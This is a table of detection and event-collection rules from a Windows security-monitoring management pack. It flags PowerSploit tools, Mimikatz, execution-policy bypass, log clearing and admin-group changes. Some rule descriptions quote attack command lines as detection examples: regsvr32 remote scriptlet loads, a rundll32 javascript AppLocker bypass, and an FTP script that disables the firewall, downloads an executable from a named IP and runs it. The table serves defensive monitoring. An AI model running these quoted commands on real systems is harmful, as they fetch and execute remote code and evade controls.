All Rules in Security.Monitoring Management Pack

| Name | Display Name | Description | ID | Target | Category | Enabled | Instance Name | Counter Name | Frequency | Event_ID | Event Source | Alert Generate | Alert Severity | Alert Priority | Remotable | Event Log |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Security.Monitoring.Collect.SMBv1Connections | Security Monitoring: Collect SMBv1 Connections | Description for the new rule | Security.Monitoring.Collect.SMBv1Connections | Microsoft.Windows.Server.OperatingSystem | None | True | | | 0 | 0 | | False | | | True | |
| Security.Monitoring.CollectionRule.CollectLAPSEvents | Security Monitoring: Collect LAPS Events | Description for the new event collection rule. | Security.Monitoring.CollectionRule.CollectLAPSEvents | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security.Monitoring.CollectLegacyTLSEvents | Security Monitoring: Collect Legacy TLS Events | This collection rule will collect events created from TLS 1.0 or TLS 1.1. Run the associated report to see where this is happening in your environment. | Security.Monitoring.CollectLegacyTLSEvents | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security.Monitoring.Event.4688.GenericCryptoRansomWare | Security Monitoring: Possible Crypto-Ransomware Installed on Computer | This rule looks for common process creation events seen when certain types of malware are installed on a server. While it likely won't be useful for something that acts immediately, it could potentially detect versions configured to activate at a later time. | Security.Monitoring.Event.4688.GenericCryptoRansomWare | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security.Monitoring.Event.ByPassExecutionPolicy | Security Monitoring: PowerShell script run natively to bypass existing execution policy | This may be a normal event, depending on how an IT environment handles scripting. That said, this generates an alert if PowerShell is run to bypass the current execution policy. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details. | Security.Monitoring.Event.ByPassExecutionPolicy | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security.Monitoring.Event.InvokeEncodedCommand | Security Monitoring: PowerShell used to Invoke an Encoded Command | One way to get around PowerShell parsing issues is to encode a command as a Base64 string. An attacker can also use this to obscure what they are really doing. This may be normal, and it may be malicious. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details. | Security.Monitoring.Event.InvokeEncodedCommand | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security.Monitoring.Event.InvokeRemoteExpression | Security Monitoring: PowerShell used to Invoke a Remote Expression | This may be a normal event, depending on how an IT environment handles scripting. That said, this generates an alert if PowerShell is run to execute something it is downloading over a web connection. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details. | Security.Monitoring.Event.InvokeRemoteExpression | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security.Monitoring.Event.KillWindowsDefender | Security Monitoring: An attempt was made to kill Windows Defender | This rule looks for 4688 events where a command was initiated to stop MsMpEng.exe, which is a Windows Defender core process. Audit process creation must be turned on, and the option to include the command line in process creation events must also be on. | Security.Monitoring.Event.KillWindowsDefender | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security.Monitoring.Event.PowerShellRuninMemoryOnly | Security Monitoring: PowerShell Running Only in Memory | There are valid reasons to run PowerShell in memory only. Attackers do this too, as it can get around a lot of antivirus checks and bypass execution policies. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://blogs.technet.microsoft.com/nathangau/2018/09/07/security-monitoring-additional-powershell-detections/ for details. | Security.Monitoring.Event.PowerShellRuninMemoryOnly | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security.Monitoring.Event.RemoteRegSvr32 | Security Monitoring: RegSvr32 used to load a DLL that is not located on this machine | A little-known RegSvr32 attack vector is the ability to load malicious DLL files from a location that the attacker controls. This can be over the internet or on an internal compromised host, as RegSvr32 can take a URL with the correct sequence. This method of attack can bypass antivirus. A mitigation is in place using EMET, but if this tool is not in the environment, there is no way to detect it. Several known attack tools use this method. See https://attack.mitre.org/wiki/Technique/T1117#Examples for details. | Security.Monitoring.Event.RemoteRegSvr32 | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security.Monitoring.Event.SeDebugPrivilegeEscalation | Security Monitoring: SeDebugPrivilege Escalation Detected | This alert is generated when a process other than WMI assigns itself debug privileges. | Security.Monitoring.Event.SeDebugPrivilegeEscalation | Microsoft.Windows.OperatingSystem | Alert | False | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security.Monitoring.Event.WMIPersistence | Security Monitoring: Possible WMI Persistence Event Detected | See this article for details: https://nathangau.wordpress.com/2019/03/06/using-scom-to-detect-wmi-persistence-attempts/ | Security.Monitoring.Event.WMIPersistence | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 5861 | | True | Error | Normal | True | Microsoft-Windows-WMI-Activity/Operational |
| Security.Monitoring.Event.WMIRemote.Destination | Security Monitoring: Possible WMI Remote Attempt Made To this System | See this article for details: https://nathangau.wordpress.com/2019/03/15/security-monitoring-using-scom-to-detect-remote-wmi-attempts/ | Security.Monitoring.Event.WMIRemote.Destination | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security.Monitoring.Event.WMIRemote.Source | Security Monitoring: Possible WMI Remote Attempt Made From this System | See this article for details: https://nathangau.wordpress.com/2019/03/15/security-monitoring-using-scom-to-detect-remote-wmi-attempts/ | Security.Monitoring.Event.WMIRemote.Source | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4648 | | True | Error | Normal | True | Security |
| Security.Monitoring.EventCollection.LanMan | Security Monitoring: Collect LANMAN Authentication | Collection rule to collect all authentication events using LanManager to authenticate. This is an old protocol that has known vulnerabilities and should be shut off. | Security.Monitoring.EventCollection.LanMan | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security.Monitoring.EventCollection.NTLMV1 | Security Monitoring: Collect NTLMV1 Events | Collection rule to collect all authentication events using NTLMv1 to authenticate. This is an old protocol that has known vulnerabilities and should be shut off. | Security.Monitoring.EventCollection.NTLMV1 | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security.Monitoring.EventCollection.WdigestAuthentication | Security Monitoring: Collect WDigest Authentication Events | If the proper audit policies are turned on, this rule will collect WDigest logons. See https://blogs.technet.microsoft.com/kfalde/2014/11/02/kb2871997-and-wdigest-part-2/ for details. | Security.Monitoring.EventCollection.WdigestAuthentication | Microsoft.Windows.Server.DC.Computer | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security.Monitoring.ExecutableRunFromUserWriteableDirectory | Security Monitoring: Executable Run from User Writeable Windows Directory | This rule looks for process creation from executables being run from key Windows directories where processes should not be run. | Security.Monitoring.ExecutableRunFromUserWriteableDirectory | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security.Monitoring.ExecutableRuninWriteableDirectoriesExtended | Security Monitoring: Executable Run from User Writeable Windows Directory Extended | This rule will generate alerts when an executable is run in an OS-writeable location. This rule will only run if the extended discovery is turned on. | Security.Monitoring.ExecutableRuninWriteableDirectoriesExtended | Security.Monitoring.WriteableLocations | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security.Monitoring.ForwardedEvents.4688.GenericCryptoRansomWare | Security Monitoring Forwarded Events: Possible Crypto-Ransomware Installed on Computer | This rule looks for common process creation events seen when certain types of malware are installed on a server. While it likely won't be useful for something that acts immediately, it could potentially detect versions configured to activate at a later time. | Security.Monitoring.ForwardedEvents.4688.GenericCryptoRansomWare | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.ByPassExecutionPolicy | Security Monitoring Forwarded Events: PowerShell script run natively to bypass existing execution policy | This may be a normal event, depending on how an IT environment handles scripting. That said, this generates an alert if PowerShell is run to bypass the current execution policy. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details. | Security.Monitoring.ForwardedEvents.ByPassExecutionPolicy | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.CollectLAPSEvents | Security Monitoring Forwarded Events: Collect LAPS Events | Description for the new event collection rule. | Security.Monitoring.ForwardedEvents.CollectLAPSEvents | WindowsEventCollectorDiscovery.EventLogCollectorServer | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security.Monitoring.ForwardedEvents.DebugEscalation | Security Monitoring Forwarded Events: SeDebug Privilege Escalation Detected | This alert is generated when a process other than WMI assigns itself debug privileges. | Security.Monitoring.ForwardedEvents.DebugEscalation | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.ExecutableRunFromUserWriteableDirectory | Security Monitoring Forwarded Events: Executable Run from User Writeable Windows Directory | This rule looks for process creation from executables being run from key Windows directories where processes should not be run. | Security.Monitoring.ForwardedEvents.ExecutableRunFromUserWriteableDirectory | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.FindAVSignature | Security Monitoring Forwarded Events: PowerSploit FindAV Signature Tool is in Use | Find-AVSignature is used to split a file into smaller chunks to detect which piece is being identified by AV. That part can then be redesigned to avoid detection. | Security.Monitoring.ForwardedEvents.FindAVSignature | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.GetDLLLoadPath | Security Monitoring Forwarded Events: PowerSploit Get DLL Load Path is in Use | Get-DLLLoadPath is used to find the name and location of a DLL that an application is using. The DLL can then be replaced with a malicious copy. | Security.Monitoring.ForwardedEvents.GetDLLLoadPath | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.GetHTTPStatus | Security Monitoring Forwarded Events: PowerSploit HTTP Path Discovery Tool is in Use | This tool is used to run a dictionary against a web server to determine the status of a path. | Security.Monitoring.ForwardedEvents.GetHTTPStatus | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.GetKeystroke | Security Monitoring Forwarded Events: PowerSploit Key Stroke Logger in Use | This is a PowerSploit tool that can be used to log keystrokes. | Security.Monitoring.ForwardedEvents.GetKeystroke | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.InvokeDLLInjection | Security Monitoring Forwarded Events: PowerSploit Invoke DLL Injection Command in Use | A PowerSploit tool used to inject code into DLL files is in use in the environment. | Security.Monitoring.ForwardedEvents.InvokeDLLInjection | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.InvokeEncodedCommand | Security Monitoring Forwarded Events: PowerShell used to Invoke an Encoded Command | One way to get around PowerShell parsing issues is to encode a command as a Base64 string. An attacker can also use this to obscure what they are really doing. This may be normal, and it may be malicious. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details. | Security.Monitoring.ForwardedEvents.InvokeEncodedCommand | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.InvokeMimikatz | Security Monitoring Forwarded Events: Invoke-Mimikatz Detected in Tier 0 Environment | Description for the new alert rule. | Security.Monitoring.ForwardedEvents.InvokeMimikatz | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.InvokeNinjaCopy | Security Monitoring Forwarded Events: Invoke Ninja Copy is in Use | This tool allows an attacker to make an offline copy of protected OS secrets (i.e. the SAM) while they are in use. | Security.Monitoring.ForwardedEvents.InvokeNinjaCopy | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.InvokePortScan | Security Monitoring Forwarded Events: Invoke Portscan is in Use | This looks for the PowerSploit tool Invoke-Portscan, which is used to scan IP addresses for open ports. | Security.Monitoring.ForwardedEvents.InvokePortScan | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.InvokeRemoteExpression | Security Monitoring Forwarded Events: PowerShell used to Invoke a Remote Expression | This may be a normal event, depending on how an IT environment handles scripting. That said, this generates an alert if PowerShell is run to execute something it is downloading over a web connection. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details. | Security.Monitoring.ForwardedEvents.InvokeRemoteExpression | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.InvokeShellCodeInUse | Security Monitoring: Invoke ShellCode is in Use | Description for the new alert rule. | Security.Monitoring.ForwardedEvents.InvokeShellCodeInUse | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.KillWindowsDefender | Security Monitoring Forwarded Events: An attempt was made to kill Windows Defender | This rule looks for 4688 events where a command was initiated to stop MsMpEng.exe, which is a Windows Defender core process. Audit process creation must be turned on, and the option to include the command line in process creation events must also be on. | Security.Monitoring.ForwardedEvents.KillWindowsDefender | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.PowerShellRuninMemoryOnly | Security Monitoring Forwarded Events: PowerShell Running Only in Memory | There are valid reasons to run PowerShell in memory only. Attackers do this too, as it can get around a lot of antivirus checks and bypass execution policies. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details. | Security.Monitoring.ForwardedEvents.PowerShellRuninMemoryOnly | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.PowerShellStartHiddenProcess | Security Monitoring Forwarded Events: Hidden Process Starting Using PowerShell | Description for the new alert rule. | Security.Monitoring.ForwardedEvents.PowerShellStartHiddenProcess | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.ForwardedEvents.RemoteRegSvr32 | Security Monitoring Forwarded Events: RegSvr32 used to load a DLL that is not located on this machine | A little-known RegSvr32 attack vector is the ability to load malicious DLL files from a location that the attacker controls. This can be over the internet or on an internal compromised host, as RegSvr32 can take a URL with the correct sequence. This method of attack can bypass antivirus. A mitigation is in place using EMET, but if this tool is not in the environment, there is no way to detect it. Several known attack tools use this method. See https://attack.mitre.org/wiki/Technique/T1117#Examples for details. | Security.Monitoring.ForwardedEvents.RemoteRegSvr32 | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security.Monitoring.PowerShellLog.FindAVSignature | Security Monitoring: PowerSploit FindAV Signature Tool is in Use | Find-AVSignature is used to split a file into smaller chunks to detect which piece is being identified by AV. That part can then be redesigned to avoid detection. | Security.Monitoring.PowerShellLog.FindAVSignature | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security.Monitoring.PowerShellLog.GetDLLLoadPath | Security Monitoring: PowerSploit Get DLL Load Path is in Use | Get-DLLLoadPath is used to find the name and location of a DLL that an application is using. The DLL can then be replaced with a malicious copy. | Security.Monitoring.PowerShellLog.GetDLLLoadPath | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security.Monitoring.PowerShellLog.GetHTTPStatus | Security Monitoring: PowerSploit HTTP Path Discovery Tool is in Use | This tool is used to run a dictionary against a web server to determine the status of a path. | Security.Monitoring.PowerShellLog.GetHTTPStatus | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security.Monitoring.PowerShellLog.GetKeystroke | Security Monitoring: PowerSploit Key Stroke Logger in Use | This is a PowerSploit tool that can be used to log keystrokes. | Security.Monitoring.PowerShellLog.GetKeystroke | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security.Monitoring.PowerShellLog.InvokeDLLInjection | Security Monitoring: PowerSploit Invoke DLL Injection Command in Use | A PowerSploit tool used to inject code into DLL files is in use in the environment. | Security.Monitoring.PowerShellLog.InvokeDLLInjection | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security.Monitoring.PowerShellLog.InvokeMimikatzInUse | Security Monitoring: Invoke-Mimikatz is in Use. | Description for the new alert rule. | Security.Monitoring.PowerShellLog.InvokeMimikatzInUse | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security.Monitoring.PowerShellLog.InvokeNinjaCopy | Security Monitoring: Invoke Ninja Copy is in Use | This tool allows an attacker to make an offline copy of protected OS secrets (i.e. the SAM) while they are in use. | Security.Monitoring.PowerShellLog.InvokeNinjaCopy | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security.Monitoring.PowerShellLog.InvokePortScan | Security Monitoring: Invoke Portscan is in Use | This looks for the PowerSploit tool Invoke-Portscan, which is used to scan IP addresses for open ports. | Security.Monitoring.PowerShellLog.InvokePortScan | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security.Monitoring.PowerShellLog.InvokeShellCodeInUse | Security Monitoring: Invoke ShellCode in Use | Description for the new alert rule. | Security.Monitoring.PowerShellLog.InvokeShellCodeInUse | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security.Monitoring.PowerShellLog.PowerShellStartHiddenProcess | Security Monitoring: Hidden Process Starting Using PowerShell | Description for the new alert rule. | Security.Monitoring.PowerShellLog.PowerShellStartHiddenProcess | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security.Monitoring.SecurityLogClearedv2 | Security Monitoring: Security Event Log was Cleared. | This rule monitors the security log for a log clearing event. | Security.Monitoring.SecurityLogClearedv2 | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security.Monitoring.SecurityMonitoring.Event.DCOUModify | Security Monitoring: Modification has been made to the DC OU | | Security.Monitoring.SecurityMonitoring.Event.DCOUModify | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security.Monitoring.SecurityMonitoring.Event.GPOCreation | Security Monitoring: A GPO was Created | A new GPO has been created. | Security.Monitoring.SecurityMonitoring.Event.GPOCreation | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security.Monitoring.SecurityMonitoring.Event.GPODeletionRule | Security Monitoring: A GPO was Deleted | This rule detects the deletion of a GPO. | Security.Monitoring.SecurityMonitoring.Event.GPODeletionRule | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security.Monitoring.SecurityMonitoring.Event.ScheduledTaskCreatedOnServer | Security Monitoring: A Scheduled Task Was Created On Server | A scheduled task was created on this server. | Security.Monitoring.SecurityMonitoring.Event.ScheduledTaskCreatedOnServer | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security.Monitoring.SecurityMonitoring.Event.ServiceCreatedonDC | Security Monitoring: A service was Created on a Domain Controller | This rule tracks the creation of a service on a domain controller. There are overridable properties for up to 5 applications so as to reduce noise. | Security.Monitoring.SecurityMonitoring.Event.ServiceCreatedonDC | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security.Monitoring.SuspiciousUserContext | New Alert Rule | This generates alerts off of commands being run from non-traditional user locations. | Security.Monitoring.SuspiciousUserContext | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security.Monitoring.SystemLogClearedv2 | Security Monitoring: System Event Log was Cleared. | This rule monitors the system log for a log clearing event. | Security.Monitoring.SystemLogClearedv2 | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| SecurityMonitoring.Event.FailedLogin | Security Monitoring: Failed RDP Logon | | SecurityMonitoring.Event.FailedLogin | Microsoft.Windows.Server.OperatingSystem | Custom | False | | | 0 | 0 | | True | Warning | Normal | True | |
| SecurityMonitoring.Failed.Login.Attempts.Collection | Collect Failed Login Attempts | Failed Login Attempts | SecurityMonitoring.Failed.Login.Attempts.Collection | Microsoft.Windows.Computer | EventCollection | True | | | 0 | 0 | | False | | | True | |
| SecurityMonitoringMP.Accounts.DomainAdminChange | Security Monitoring: Domain Admins membership has changed | | SecurityMonitoringMP.Accounts.DomainAdminChange | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| SecurityMonitoringMP.Accounts.EnterpriseAdminChange | Security Monitoring: Enterprise Admins membership has changed | | SecurityMonitoringMP.Accounts.EnterpriseAdminChange | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| SecurityMonitoringMP.Accounts.LocalAdminChange | Security Monitoring: Local Administrators Group was Modified | | SecurityMonitoringMP.Accounts.LocalAdminChange | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| SecurityMonitoringMP.Accounts.SchemaAdminChange | Security Monitoring: Schema Admins membership has changed | | SecurityMonitoringMP.Accounts.SchemaAdminChange | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| SecurityMonitoringMP.APPLocker.Mimikatz | Security Monitoring: Mimikatz in use | Mimikatz is a credential theft tool used for pass-the-hash attacks. This should not be present in your environment. | SecurityMonitoringMP.APPLocker.Mimikatz | Microsoft.Windows.Computer | Alert | False | | | 0 | 0 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| SecurityMonitoringMP.APPLocker.ProhibitedApp | Security Monitoring: Prohibited App in Use | | SecurityMonitoringMP.APPLocker.ProhibitedApp | Microsoft.Windows.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| SecurityMonitoringMP.APPLocker.PSExec | Security Monitoring: PSEXEC in Use | | SecurityMonitoringMP.APPLocker.PSExec | Microsoft.Windows.Computer | Alert | False | | | 0 | 8003 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| SecurityMonitoringMP.APPLocker.WCE | Security Monitoring: WCE in Use | WCE is a credential theft tool used to perform pass-the-hash attacks and enumerate WDigest passwords if this is turned on in your environment. Other than penetration testing, there is little reason for this tool to exist in your environment. This should be investigated immediately. | SecurityMonitoringMP.APPLocker.WCE | Microsoft.Windows.Computer | Alert | False | | | 0 | 8003 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| SecurityMonitoringMP.APPLocker.WinRar | Security Monitoring: WinRar in use | | SecurityMonitoringMP.APPLocker.WinRar | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 8003 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| SecurityMonitoringMP.Event.4688.SuspiciousApplockerJava | Security Monitoring: A suspicious process creation (AppLocker bypass) was executed | To bypass restrictive AppLocker policies, attackers will implement a specially crafted command line which makes use of the Windows native executable "Rundll32.exe" (required by Windows to load and run code in DLLs and therefore not blocked by AppLocker). Rundll32.exe can be used to call JavaScript to execute arbitrary commands which are not blocked by restrictive AppLocker policies. The rundll32.exe syntax is as follows: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";<code> Events of this nature need to be investigated. | SecurityMonitoringMP.Event.4688.SuspiciousApplockerJava | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| SecurityMonitoringMP.Event.4688.SuspiciousApplockerRegsvr | Security Monitoring: A suspicious process creation (AppLocker bypass using regsvr32) was executed | AppLocker bypass techniques using Regsvr32.exe (greg). Note: the following is already contained in SCUBA_RULE_Applocker_Bypass. Examples: regsvr32 /s /n /u /i:file.sct scrobj.dll; regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll; regsvr32 /s /n /u /i:http://server/file.jpg scrobj.dll | SecurityMonitoringMP.Event.4688.SuspiciousApplockerRegsvr | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| SecurityMonitoringMP.Event.4688.SuspiciousCMD | Security Monitoring: A suspicious process creation (cmd) was executed | These events should be investigated. We are tracking 4688 events with known strings often found in malicious scripts. While it is possible that there are normal conditions for this rule, any alert should be investigated immediately. | SecurityMonitoringMP.Event.4688.SuspiciousCMD | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| SecurityMonitoringMP.Event.4688.SuspiciousFTPCommand | Security Monitoring: A suspicious process creation (FTP script execution via echo command) was executed | Detection of FTP scripts created via the echo command. Based on several cases where a compromised SQL service was used and SQL Agent jobs were created to invoke 'xp_cmdshell', which in turn created and launched FTP scripts to download and run malware. Example of the command line used to create and run FTP scripts: "Command Line ": "\"\"\"C:\\Windows\\System32\\cmd.exe\"\" /c \"\"net1 stop sharedaccess&echo open 222.186.58.12 >> love.txt&echo 123>> love.txt&echo 123>> love.txt&echo binary >> love.txt&echo get r.exe >> love.txt&echo bye >> love.txt&ftp -s:love.txt&p -s:love.txt&r.exe&r.exe&del love.txt /q /f&exit\"\"\" This type of event is rare and should be investigated. | SecurityMonitoringMP.Event.4688.SuspiciousFTPCommand | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| SecurityMonitoringMP.Event.4688.SuspiciousReg | Security Monitoring: A suspicious process creation (registry) was executed | This rule inventories 4688 events and flags alerts for manually added registry keys. These are rare events and should be investigated when they appear. | SecurityMonitoringMP.Event.4688.SuspiciousReg | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| SecurityMonitoringMP.Event.4688.SuspiciousWindowsPosition | Security Monitoring: A suspicious process creation (malicious use of WindowPosition with PowerShell) was executed | See https://technet.microsoft.com/en-us/library/cc957410.aspx. The WindowPosition value specifies the position of the command window on the user's screen. The value of this entry is an 8-byte hexadecimal value. The first four bytes (high word) represent the position of the window on the X (horizontal) axis. The last four bytes (low word) represent the position of the window on the Y (vertical) axis. When the WindowPosition value is set to 201329664 (hex: 0x0c00 0c00), this places the console in a non-visible section of the user's screen (where X axis = 0c00 and Y axis = 0c00), in an area that is hidden from view below the visible start menu/taskbar. Other console apps that can be modified to make the screen non-visible | SecurityMonitoringMP.Event.4688.SuspiciousWindowsPosition | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| SecurityMonitoringMP.Event.GoldenTicketDetection | Security Monitoring: Possible Golden Ticket in Use | | SecurityMonitoringMP.Event.GoldenTicketDetection | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 4769 | | True | Error | Normal | True | Security |
| SecurityMonitoringMP.Event.LocalAccountCreatedonServer | Security Monitoring: Local account created on a member server | In a normal environment, this will only happen when the system is set up. You should not see this event on production member servers at all. | SecurityMonitoringMP.Event.LocalAccountCreatedonServer | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
